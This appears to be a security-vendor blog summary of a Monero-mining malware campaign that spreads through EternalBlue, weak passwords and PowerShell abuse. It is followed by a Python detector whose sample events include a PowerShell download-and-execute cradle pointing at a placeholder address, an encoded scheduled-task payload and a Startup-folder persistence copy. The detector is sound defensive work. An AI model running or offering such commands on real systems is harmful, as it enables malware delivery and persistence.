Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse - TrendLabs Security Intelligence Blog
12 April 2019 6:26 AM GMT
We analyzed a malicious Monero miner that uses multiple methods for propagation and infection. Initially found infecting systems in China, the malware is expanding to Australia, Taiwan, Vietnam, Hong Kong and India, and has added infiltration techniques such as EternalBlue and PowerShell abuse.
- We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible.
- Initially observed in China in early 2019, it previously infected networks by exploiting weak passwords and using the pass-the-hash technique, Windows administration tools, and brute-force attacks with publicly available code.
- Once a machine is infected via one of these methods, the malware acquires its MAC address and collects information on the anti-virus products installed on it.
- It leverages weak passwords on computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts whose components are downloaded and executed in memory, exploits unpatched vulnerabilities, and installs itself via the Windows startup folder and the task scheduler.
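As an added illustration (not code from the Trend Micro post or its authors), the following Python flags the behaviours listed above in exported PowerShell command lines or script-block log text: an in-memory download-and-execute chain, an encoded command (decoded first so the rules see the real script), scheduled-task creation, and a write to the Startup folder. The sample events, the 192.0.2.10 address and the rule names are constructed for this example.

```python
import base64
import re

# A download primitive alone is common in admin scripts, so the in-memory rule
# needs a download AND an execute primitive in the same command or script block.
DOWNLOAD = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I)
EXECUTE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
SCHTASK = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create", re.I)
STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup", re.I)
ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(line):
    """Replace a -EncodedCommand payload (base64 of UTF-16LE) with the script it hides."""
    m = ENCODED.search(line)
    if not m:
        return line
    try:
        script = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return line  # malformed payload: scan the raw line; the encoded tag still fires
    return line[: m.start()] + " " + script

def classify(line):
    """Return the set of suspicious behaviours seen in one command line or script block."""
    text = decode_encoded_command(line)
    tags = set()
    if DOWNLOAD.search(text) and EXECUTE.search(text):
        tags.add("in_memory_download_exec")
    if ENCODED.search(line):
        tags.add("encoded_command")
    if SCHTASK.search(text):
        tags.add("scheduled_task_persistence")
    if STARTUP.search(text):
        tags.add("startup_folder_persistence")
    return tags

def scan(lines):
    """Return [(line, tags)] for every line that triggered at least one rule."""
    return [(l, classify(l)) for l in lines if classify(l)]

# Constructed sample events (not from the page); 192.0.2.10 is a documentation address.
_ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/b.ps1')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')",
    'schtasks /create /sc minute /mo 30 /tn "Update" /tr "powershell -enc ' + _ENC + '"',
    r'cmd.exe /c copy C:\Users\Public\run.vbs "C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the plain `-File` invocation alone; feed it real Event ID 4688 command lines or 4104 script-block text instead of the constructed list.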